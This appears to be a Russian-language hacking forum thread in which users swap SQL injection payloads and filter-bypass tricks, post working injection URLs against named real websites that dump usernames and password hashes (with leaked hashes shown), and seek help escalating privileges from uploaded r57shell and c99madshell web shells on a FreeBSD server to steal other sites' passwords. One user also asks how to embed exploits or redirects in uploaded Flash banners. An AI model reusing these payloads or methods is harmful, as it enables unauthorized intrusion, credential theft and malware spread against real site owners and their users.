Как вариант: Code: -1' OR id=IF(ASCII((SELECT USER()))>=254,'1','0') -- И перебирать по символам, скелет сплоита, работающего по этому принципу, можешь взять к примеру у меня: /thread79705.html
Народ ну пожалуйста подскажите как повысить привелегии на freebsd 6.2 или как вытащить пароли, а то я впервые залил шел и не могу ниче сделать толкового (сэйф моде отключен)
может фильтроваться только "union" в нижнем регистре, встречал такое одажды. -> "UniOn" после того, как админ пофиксил, я использовал " -> "un/**/ion". гдето видел статью на тему обхода фильтрации, на досуге поищу в своих архивах (-
o3,14um там пятая ветка, разные UnIoN, uni"+"on,un/**/ion - не проходят. http://ma s t e r o ff.org/edit.php?q='' (13cols)
Ну блин - залить это одно а серв прокавырять это ж совсем другое. Из по админа сайта залил, вот а что дальше делать чтоб к остальным сайтам на этом серваке пробиться?
вот держи http://www.ewb-usa.org/news.php?ID=-1'+union+select+version(),2,3/* дальше сам кавыряй...))
вот решил добить... http://www.ewb-usa.org/news.php?ID=-1'+union+select+concat(username,char(58),password),2,3+from+auth_users/*
Спасибоо !! одна ' все решает ))) http://www.ewb-usa.org/news.php?ID=-1'+union+select+concat_ws(0x3a,UserName,password),2,3+from+auth_users+limit+3,1/* Ann:1756543d9b768d870fab2000d9b667f8 Meg:f807febec044b8dfa8996c79da35e599
Люди помогите плиз. У меня проблема - залил r57shell на серв - там сэйф моде отключен система freebsd 6.2. Можно ли как нибудь повысить привелегии, или вообще получить пароли к остальным сайтам на этом серве - это моя основная цель (из файлов с паролями читается только pwd.db, а passwd файла вообще нет, поэтому назревает вопрос а можно ли прочитать как нибудь master.passwd). Заранее спасибо
http://www.site//out.asp?id=1+or+1=(SELECT+TOP+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+x_ads_account)-- почему пишет, что неверное слово or, когда ДО этого, я спокойно его использовал при выводе таблиц? можно ли его заменить как-то? Ann:1756543d9b768d870fab2000d9b667f8:new!pass#
стандарт: узнай че висит на сервере, потом идешь, например, на милворм и ищешь "инструмент"(эксплойт) и можешь действовать
Я новичек поэтому жаргон еще не совсем знаю... Сори за тупой вопрос... А висит на сервере это типа какие демоны запущены или что? и искать эксплойт под ядро операционки или под какую то другую лажу?
swf - баннеры Вопрос такой: могу заливать и вешать баннеры на одном хосте. проверки антивирем содержимого баннера нету, фильтрация по расширению не стоит (вроде как). Директорию, куда пишутся файлы не получилось определить, и походу там есть несколько моих вебшеллов :-/ возможно ли записать в тело баннера код, который бы автоматичевки выполнялся при загрузке баннера? что можно выжать максимально из возможности заливки и вывешивания баннеров (что-то вроде iframe, автоматической переадресации на "нужный сайт", запихнуть в него сплоит. или что нибудь в таком духе) В вопросе по устройству и возможностях swf-файлов ничего не знаю, вот и задаю вопрос (-
Определи директорию банально. Просто "копировать адрес рисунка", после имя твоего файла допишешь и всё.
баннер это не картинка, a "Shockvawe Flash Object" :-\ анимашка. Code: data="http://_______/banners/c99madshell.php.SWF" ......... <param name="movie" value="banners/c99madshell.php.SWF"> захожу в дерикторию /banners/ и она пустая, файлов нет Х___х нужны действующие способы (- репой закидаю (-